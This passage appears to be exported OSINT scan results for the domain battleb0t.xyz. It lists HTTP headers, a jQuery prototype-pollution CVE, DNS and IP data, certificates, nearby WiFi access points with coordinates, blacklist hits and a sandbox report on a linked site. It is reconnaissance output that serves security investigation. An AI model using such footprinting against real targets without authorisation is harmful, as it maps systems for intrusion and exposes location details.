"{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=u1lyJPU0WioZJ7gW30pw%2F1QYGnEvSi6VguD4iZQLy9JFxNjUYX7Kn2AvbK1RwFeWf6Bc3GtzenDe9QfSS82xeo%2BaVIIeURcDQSNP2UoyOSj%2Fo0e2kf0IgvowllGBeio%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60715ea2423d-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:01:39 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.171): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:13 | Physical Location | No | Censys | 0 | 0 | 4 | 0 | None | San Francisco, California, 94107, United States, North America | 2606:4700:3030::ac43:a8fc |
| 2023-05-12 03:08:53 | Vulnerability - CVE Medium | Yes | Tool - Retire.js | 0 | 0 | 4 | 0 | None | CVE-2019-11358
https://nvd.nist.gov/vuln/detail/CVE-2019-11358
Score: 6.1
Description: jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable __proto__ property, it could extend the native Object.prototype. | http://code.jquery.com/jquery-3.2.1.js |
| 2023-05-12 03:08:55 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.82 | 34.74.170.74 |
| 2023-05-12 03:03:42 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | nuke.battleb0t.xyz | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://nuke.battleb0t.xyz', u'http_status': 521, u'plugins': {u'HTTPServer': {u'string': [u'cloudflare']}, u'Script': {}, u'Country': {u'string': [u'RESERVED'], u'module': [u'ZZ']}, u'Title': {u'string': [u'nuke.battleb0t.xyz | 521: Web server is down']}, u'HTML5': {}, u'UncommonHeaders': {u'string': [u'referrer-policy,cf-ray']}, u'IP': {u'string': [u'172.64.80.1']}, u'X-Frame-Options': {u'string': [u'SAMEORIGIN']}, u'X-UA-Compatible': {u'string': [u'IE=Edge']}}}, {}] |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | itch.io (Category: gaming)
https://itch.io/profile/login | login |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Andrea Schwartz Gallery (Net ID: 00:01:9F:3D:4F:68) | 37.7813933,-122.3918002 |
| 2023-05-12 03:01:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.100): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:56:04 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://startling-sfogliatella-ade5c2.netlify.app/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_9dc_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_9dc_IESQMMUTEX_0_303"\n "IsoScope_9dc_IESQMMUTEX_0_519"\n "IsoScope_9dc_IESQMMUTEX_0_331"\n "IsoScope_9dc_IE_EarlyTabStart_0xa98_Mutex"\n "IsoScope_9dc_ConnHashTable<2524>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2524"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.196.30.220:443"\n "34.90.63.227:443"\n "54.177.195.4:443"\n "35.190.72.161:443"\n 
"104.18.156.225:443"\n "35.190.36.172:443"\n "35.190.13.203:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar2A22.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"aux.fqtag.com"\n "cdn.fqtag.com"\n "easy.find-your-partner.club"\n "flx808.lporirxe.com"\n "fqtag.com"\n "www.meetukrainianwomen.com"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "WT0NBVZJ.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\WT0NBVZJ.txt]- [targetUID: 00000000-00003572]\n Dropped file: "ESIOX51V.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ESIOX51V.txt]- [targetUID: 00000000-00002524]\n Dropped file: "06P9WVSV.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\06P9WVSV.txt]- [targetUID: 00000000-00003572]\n Dropped file: "TW7Y30DW.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\TW7Y30DW.txt]- [targetUID: 00000000-00003572]\n Dropped file: "OOCMX2SA.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\OOCMX2SA.txt]- [targetUID: 00000000-00003572]\n Dropped file: 
"XW6TPSB5.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\XW6TPSB5.txt]- [targetUID: 00000000-00003572]\n Dropped file: "RV2OG8JU.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\RV2OG8JU.txt]- [targetUID: 00000000-00002524]\n Dropped file: "DFCSLJSN.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\DFCSLJSN.txt]- [targetUID: 00000000-00003572]\n Dropped file: "8QJH7RWY.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\8QJH7RWY.txt]- [targetUID: 00000000-00003572]\n Dropped file: "73YHWE7Q.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\73YHWE7Q.txt]- [targetUID: 00000000-00003572]\n Dropped file: "QT4XHCLB.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QT4XHCLB.txt]- [targetUID: 00000000-00003572]\n Dropped file: "3EMEL256.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\3EMEL256.txt]- [targetUID: 00000000-00002524]\n Dropped file: "U7KDM2QP.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\U7KDM2QP.txt]- [targetUID: 00000000-00003572]\n Dropped file: "5TF9TLHL.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\5TF9TLHL.txt]- [targetUID: 00000000-00003572]\n Dropped file: "IQ7XDVLA.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\IQ7XDVLA.txt]- [targetUID: 00000000-00003572]\n Dropped file: "S85IMHP1.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\S85IMHP1.txt]- [targetUID: 00000000-00003572]\n Dropped file: "5TL5FP3H.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\5TL5FP3H.txt]- [targetUID: 00000000-00003572]\n Dropped file: "2J5IT986.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2J5IT986.txt]- [targetUID: 00000000-00003572]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab2A21.tmp" 
has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab28E6.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "WT0NBVZJ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\WT0NBVZJ.txt]- [targetUID: 00000000-00003572]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003572]\n "jquery.autoComplete_1_.js" has type "UTF-8 Unicode text with CRLF line terminators"- [targetUID: N/A]\n "logo_3_.png" has type "PNG image data 862 x 94 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "animate_1_.css" has type "ASCII text with CRLF line terminators"- [targetUID: N/A]\n "ESIOX51V.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ESIOX51V.txt]- [targetUID: 00000000-00002524]\n "06P9WVSV.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\06P9WVSV.txt]- [targetUID: 00000000-00003572]\n "LibreBaskervilleBold_1_.eot" has type "Embedded OpenType (EOT) LibreBaskervilleBold family"- [targetUID: 
N/A]\n "bgpure_1_.jpg" has type "JPEG image data Exif standard: [TIFF image data little-endian direntries=0] baseline precision 8 1920x962 components 3"- [targetUID: N/A]\n "Cab2A21.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab2A21.tmp]- [targetUID: 00000000-00003572]\n "my_validate_index2_1_.js" has type "UTF-8 Unicode text with CRLF line terminators"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "TW7Y30DW.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\TW7Y30DW.txt]- [targetUID: 00000000-00003572]\n "OOCMX2SA.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\OOCMX2SA.txt]- [targetUID: 00000000-00003572]\n "XW6TPSB5.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\XW6TPSB5.txt]- [targetUID: 00000000-00003572]\n "Tar2A22.tmp" has type "data"- Location: [%TEMP%\\Tar2A22.tmp]- [targetUID: 00000000-00003572]\n "LibreBaskervilleBold_1_.woff" has type "Web Open Font Format TrueType length 33572 version 1.0"- [targetUID: N/A]\n "~DFE2927C1515C3768D.TMP" has type "data"- Location: [%TEMP%\\~DFE2927C1515C3768D.TMP]- [targetUID: 00000000-00002524]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://startling-sfogliatella-ade5c2.netlify.app/"\n Pattern match: "https://startling-sfogliatella-ade5c2.netlify.app"\n Heuristic match: "aux.fqtag.com"\n Heuristic match: "cdn.fqtag.com"\n Heuristic match: "flx808.lporirxe.com"\n Heuristic match: "fqtag.com"\n Pattern match: 
"www.meetukrainianwomen.com"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-6', u'name': u'Found an IP/URL artifact that was identified as malicious by at least three reputation engines', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u're | 104.196.30.220 |
| 2023-05-12 02:53:20 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:23:36:1a:72:6e:fc:71:09:49:b1:35:f9:b5:e5:28:80:de
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 13 12:52:05 2023 GMT
Not After : Jun 11 12:52:04 2023 GMT
Subject: CN=kekw.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:bd:f9:3b:c0:6f:f8:ab:e7:35:d5:ff:95:55:28:
87:2c:f3:42:5c:6a:f2:dc:b2:0f:7b:b2:97:bc:68:
c2:d8:25:b1:da:3c:de:c9:ee:4a:54:a6:08:c9:a0:
d5:34:39:c8:96:b7:d1:e3:5d:f3:2b:db:f7:37:5d:
57:65:f7:3d:16:c9:ad:d6:e6:bb:bc:97:c6:1c:bc:
c7:1d:a0:c9:cc:3a:d4:e1:69:37:d2:58:c2:fe:42:
4e:90:a6:4c:72:5e:0f:c5:0a:f9:18:b1:c7:54:af:
b4:03:13:bc:ce:85:b6:0d:a5:99:fc:98:b2:37:24:
39:66:7b:f1:78:3b:4b:9e:51:be:75:ad:a6:19:8d:
be:a9:ca:f2:df:b7:73:9f:c6:14:09:e1:46:c4:93:
a4:45:7c:eb:1e:47:42:88:d1:8d:e7:29:c0:07:7b:
ad:57:d3:0b:cf:a1:a1:bc:65:12:20:8e:92:81:50:
55:40:69:4e:0d:62:29:ab:00:e6:81:6e:83:3a:16:
09:da:2a:57:32:b1:5d:79:74:f0:1d:02:e0:52:6d:
d5:85:2d:cb:f6:ef:5e:8f:03:a0:14:64:19:bb:71:
65:85:3e:bc:4e:e8:75:85:4b:a0:7d:df:3f:2a:67:
46:82:ea:56:e3:e5:01:c8:49:e2:f1:a3:b1:04:af:
98:45:24:1b:7e:2d:57:39:72:ff:5a:94:89:31:42:
ae:19:e5:2d:eb:c8:08:fc:be:37:02:5d:04:1a:b3:
f0:62:42:14:91:38:7a:96:77:5e:53:eb:f1:d9:8e:
45:46:0d:65:07:6b:18:0a:65:96:3c:4e:b9:77:05:
52:b4:4d:17:73:72:d9:49:c8:16:75:9c:84:35:12:
73:86:4f:08:27:5d:f3:e9:85:10:9a:ff:e4:3a:63:
ef:83:9f:03:76:a4:3f:ac:72:d5:f4:bb:3a:60:bc:
21:1c:e8:7c:52:79:bd:fe:19:9a:69:78:22:a6:5d:
64:8d:04:55:f3:ec:4d:6c:47:45:2c:6c:9e:cc:14:
be:67:76:25:be:fd:51:60:a1:2e:10:af:1b:46:0c:
e9:ec:3a:3c:0b:c9:2a:97:61:1c:a8:6a:9d:53:cd:
2d:6c:4e:66:f4:08:01:29:89:61:ff:d2:73:d2:a1:
da:94:32:dc:5c:78:ad:19:fa:b3:fb:26:0f:35:c2:
87:17:c9:ae:6f:c7:ce:81:d6:7d:27:95:3b:49:39:
e6:cf:30:85:95:79:a1:35:71:86:5b:66:f7:9d:ae:
96:d5:9a:1d:e3:e0:76:fe:b7:a0:b5:1a:16:0b:1b:
5e:d4:d9:5b:b6:4a:4d:33:65:03:80:b9:ab:69:35:
1b:42:d7
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
E6:0D:FB:5E:53:09:44:30:22:92:3D:83:C3:34:06:A0:52:1B:50:06
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:kekw.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Mar 13 13:52:05.336 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:57:F9:C2:75:97:36:8B:12:D4:C1:E7:CA:
50:E7:70:49:3E:19:7B:CF:6E:2E:B2:32:0A:7B:AB:5D:
31:9F:A6:29:02:21:00:A5:FD:E1:03:A8:C4:49:20:AF:
46:1D:1E:50:E3:8E:07:43:7A:DC:16:22:84:DD:F5:8B:
28:06:E9:91:CB:AE:41
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Mar 13 13:52:05.327 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:19:EA:4C:FF:35:E1:97:F0:36:1E:40:22:
0D:44:8D:BA:C6:F1:8F:73:35:1F:B7:67:97:EA:2B:1B:
FC:27:7F:33:02:21:00:81:59:F8:29:60:75:D8:8F:00:
60:06:8E:9A:65:C6:5E:93:57:7E:5C:BF:B5:78:29:4F:
6F:C1:3B:97:29:1D:C7
Signature Algorithm: sha256WithRSAEncryption
24:d6:1b:d8:e4:8b:66:d1:df:e9:e2:97:93:78:a9:26:b8:6c:
f8:3c:98:90:50:e1:55:d7:91:ae:77:21:2c:40:df:85:16:56:
67:98:1c:b9:14:ca:43:24:bf:39:32:06:c7:fe:42:03:fa:45:
3b:3f:39:c5:26:88:13:e9:3d:1d:bc:bd:a1:0a:08:74:1a:3b:
e6:07:80:5b:f5:9a:21:ed:4a:45:40:ac:8a:6d:c1:de:40:12:
47:d5:33:88:6e:06:c5:32:a1:76:01:b1:50:fb:53:29:92:fa:
e1:03:af:88:12:00:9a:38:a5:9d:32:3e:46:8b:7c:f6:27:29:
ec:fa:85:68:fa:91:a6:95:c5:d7:a0:da:33:eb:03:cf:9c:a6:
c0:5c:0d:e8:d8:f8:03:5d:fb:9f:61:df:e1:a0:63:74:01:18:
4c:0d:17:f3:db:74:32:3c:fc:3b:44:24:e7:10:2b:f7:69:d2:
89:35:6f:e7:d7:11:5a:13:0a:a9:83:9e:0f:c2:f2:ea:d8:50:
30:65:9c:16:49:f6:30:d8:a2:e3:83:ff:5d:ff:00:a2:ff:57:
de:68:f4:70:90:a3:db:c8:9c:55:ce:ea:f6:4c:08:6a:01:70:
91:f9:f8:91:9d:f2:99:1f:be:06:10:87:53:07:83:04:df:62:
62:3f:1f:52
| battleb0t.xyz |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 5 | 0 | None | cloudflare | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "REVALIDATED", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"79120efbf2a0b92da044ff91335c99c1\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=vgB2xlauGELdj%2BVZddouVM4SLWiyGeZvDcjgyrNUJ4TCe9uwaasjv9pVNp9guo70Mwha6%2BIFTjO1Dq74W7EW2JKyrFRh0Oar6OFkdlmTZx5KugtXbII33uvqzZHNgPLMNucdvqQl\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f605ceb464381-EWR"} |
| 2023-05-12 03:09:58 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | dgn.keyubu.com | 87.248.157.111 |
| 2023-05-12 02:46:38 | BGP AS Membership | No | RIPE | 0 | 0 | 3 | 0 | None | 13335 | 104.21.0.0/20 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | heberlein (Net ID: 00:02:2D:30:2C:33) | 37.7642, -122.3993 |
| 2023-05-12 03:00:50 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00.github.io | 185.199.111.153 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:54:10:ED) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:16:26 | Physical Location | No | ipapi.co | 1 | 0 | 2 | 0 | None | Bursa, Bursa, 16, Turkey, TR | 87.248.157.102 |
| 2023-05-12 02:44:14 | Domain Name | No | DNS Resolver | 0 | 0 | 1 | 0 | None | battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | PET KLINIK (Net ID: 00:12:BF:30:95:FA) | 40.2024, 29.0398 |
| 2023-05-12 03:18:06 | URL (Purely Static) | No | Page Information | 0 | 0 | 3 | 0 | None | http://kekw.battleb0t.xyz/jar | <!DOCTYPE html>
<html>
<iframe src="https://cloudways-static-content.s3.us-east-1.amazonaws.com/error_page/maintenance-domain-mapping.html" frameborder="0" style="overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px" height="100%" width="100%"></iframe>
</html> |
| 2023-05-12 03:18:06 | URL (Form) | No | Page Information | 0 | 0 | 6 | 0 | None | https://www.ayhu.xyz/?__cf_chl_f_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f60726fad1912')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=KlbaNJzGw77sVIKMODL.ADC4FpZJphIcqM52Ij1fyiw-1683860063-0-gaNycGzNChA" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="kO2xNaAYVVwzudN_grHGsSAbBGIYi5Rp9eWkwq8bobk-1683860063-0-AQEme0OuFvC27LD-nLe2jrmTTnxOgSGtlJ79kOqNI8O_bMBUHsCUifsyrQtE2Qw_5-G3wZLVyXKSq4HyXvLjyCiAdaCGs4Ok-COq8gyypPok4HyuqEcnabkOPj9JKzn7fzxQf8pA4avsXNbgzL5RFZ0OappR_ENyOliTj3y1usOCEfdx0Qw-4NtIYkgBrlm6HYt1w2WiYgJIzvrwK3xMFits_Ebjt14epXfZCroTuFIFxaYyyRcuJJEK3ck04c2JtRdR99xcpwbep8NMi6CNOGP-aAH4FLQSKV1p7HK0fEmUDFvoadw-7bo2EucRyXYFLEbjS7Z_OKl0Srfy1Vim3Z_jqewduFNgcp1B-ir-aT25S4z2lvk1aBpRpS3Fpn4bKR_T7uQSek6SD4z_I81JUPCm-TbJt2WcAviPmmrfZDtigYqwaDeqh4Pqa29XowW1l1nnKs6qCFhQeaLuigzJf9PhtuPk6Ts6nn4TNWVyl9ze9NMDXt3HC-u5rh_1KxQxsTY_4JhB1jT5PYZQMJUvzkddK2MPm_CtJJRmvzu4A8h1xyRkeTxVWjg5p76zqZFKP8HOoZP1u7GkAK20kE8vR-O-Gy6CmmKj5hSdpF5vjt71wmiC0vDCk1rDRhhcEkt92S6uijW7cxkpckY78siJqFhpHOVFodJroZuf7HFMwvosFXQ5NGYyHEQXXlmkoclMMK3rVJNdxiIstjCLFnDxNsbd1epvptoA5TGFKFTmHs6QjRzTIv_BIuw1QORH1eUHK9O9N-txmFD1IbLACf92gVKiwNsAAtrRtW2F06n6d9Vs_GXVIbPcV6cwsJdIquww9NaI78ELNHJNq1J_tTdFxBZavYogbVnqkQFRmkO2l5VXSM6E9dcoOwi5q4qHSrZmlxJHiqDY-PKE8PDBSk8akurNHoBfBjtw2_a1RfC_lu8B7yXfZ1SNiql9epxt9-xA01ZEs-JXEIWKB7DVUehYb7RiTKZ_trIoGgh7Q6yEfeLCDTtC1yC2iiOVhPkX_h4Qfaf7LfPKruh9cjrbe0r7qMb0h8bIRy1fsQXVXXjhWHUJzLPbbOWh7F_0GW3qFusmjdR_P6sJL-gXtd5koZkzn6EK_YdKJO6jY9uPxr4sRnkK0ioS_0VfK7kQax3cDEA5YcxYvkmmBl4DMVhT7ISnmS5G8dSMhHOdJpbJMK5G9qQm8E9Nux-WgwCPgj6TkAmQMz1NenXnJJdqz-irhHABa_tynmZ1IPtBtnIPWbu4Mgp5VyNXvvUpfdGX7V6s-SjMtH9NRG3i4YZDcDp72B0EVaiT4n2jNeEilDlbVLw8k42_nwTD7Pw7hKXZpTyQQZntWW5wgIly7x0dOOWeJl6TsZIiDLpQjNv-mLX_xQzZHdw5kii58Ccy2XJ4npuVEuBraZJ9n6B2-5AwWyV3Qr3DTuk5PmfcIxKTr_u7HsbpdFR4FKp9wurJ9rvdDIpbL_yKOtyqM9yLjxeOpIdNG7zFw8AT7XqbUfz26ewFlzRX_Cc5FOV6ATYROS3OVpko2KV-NVpYQTJgT-fYvExK0W6Ze5BMg7wpM4RSZGt0EBF4MTRkHZYYHYqVG2Gs4Dr0KphCmDsWmTYs-Wp4YmyX8zHXt6eDU7SHKTxfT3pFaOqsKIwmwk1FnA5ZOhkDp5FB4KDNaO4UI8hC2NqGaVRdddker5xFPIyxy6_xtT-933_JQEm4Yo3p33SKpnr5oZLDUmiFpcGiocX8E23z9qF6KzqiLjSYYuEdSQjfT3AOVajEAM3LV2cJ-Yfb6qV1mYvKIEbYataggM_S7XSDOMFwSxuBJJhFB_YuSQY42F1bw3h-Wr_txcqos6CYojszcuJZzN7ZQwVv-pfKRrZP1vW37Ji7qXYRsXGXizVLTDb80myaduEuuPiE3
